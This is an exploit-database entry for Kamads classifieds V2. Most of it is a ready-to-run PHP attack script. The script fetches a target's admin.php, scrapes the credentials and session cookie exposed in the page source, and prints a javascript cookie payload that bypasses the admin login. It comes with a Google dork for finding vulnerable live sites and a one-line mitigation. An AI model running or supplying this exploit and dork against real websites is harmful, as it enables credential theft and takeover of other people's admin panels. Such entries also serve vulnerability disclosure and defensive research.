Kamads classifieds V2 Multiple Vulnerabilities

vendor:

Kamads classifieds V2

by:

Mr.tro0oqy

7,5

CVSS

HIGH

Multiple Vulnerabilities

N/A

CWE

Product Name: Kamads classifieds V2

Affected Version From: V2

Affected Version To: V2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Kamads classifieds V2 Multiple Vulnerabilities

Kamads classifieds V2 is vulnerable to multiple vulnerabilities. An attacker can exploit these vulnerabilities to gain access to the admin panel of the application. The attacker can use the dork 'inurl:V2A_XHTML' to find vulnerable websites. The attacker can then use the exploit code 'javascript:document.cookie="$ja=$ja2;path=/";' to gain access to the admin panel.

Mitigation:

The application should be updated to the latest version to patch the vulnerabilities.

Source

Exploit-DB raw data:

<?php


if ($argc < 2) 
{ 
echo "\n+-----------------------------------------------------------------+\n"; 
echo "|         Kamads classifieds V2 Multiple Vulnerabilities            |\n"; 
echo "|                          Author:Mr.tro0oqy                        |\n"; 
echo "|                          uxxd@hotmail.com                         |\n";   
echo "|                        dork:inurl:V2A_XHTML                       |\n";  
echo "|                                                                   |\n";               
echo "+-------------------------------------------------------------------+\n";
print "\nUsage........: php $argv[0] <host><path><admin.php>\n"; 
print "\nex...........: php $argv[0] http://www.target.com/V2A_XHTML/admin/admin.php\n";
die(); 
}else {


$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$argv[1]");
$op1 = curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch,COOKIESESSION,true);
curl_setopt($ch,CUSTOMREQUEST,"get");
$x = curl_exec($ch);


if ($t = stristr($x,"username = ") and  stristr($x,"password = ")) {
echo "\n";
echo "\n";
echo $new = substr($t,0,94);


if ($co=stristr($x,"theCookieName") and $co2=stristr($x,"theCookieValue")) {

echo "\n";
echo "\n";
echo $new2 = substr($co,0,35);
echo "\n";
echo $new3 =substr($co2,0,40);
echo "\n";
echo "\n";

$ja = substr($new2,17,15);
echo "\n";
$ja2 = substr($new3,18,18);
echo "\n";
echo "\n";
echo "\n";


echo $exploit =  "javascript:document.cookie=\"$ja=$ja2;path=/\";";
echo "\n";
echo "\n";
echo "\n";
}



}else {
echo "not found";

}

}
?>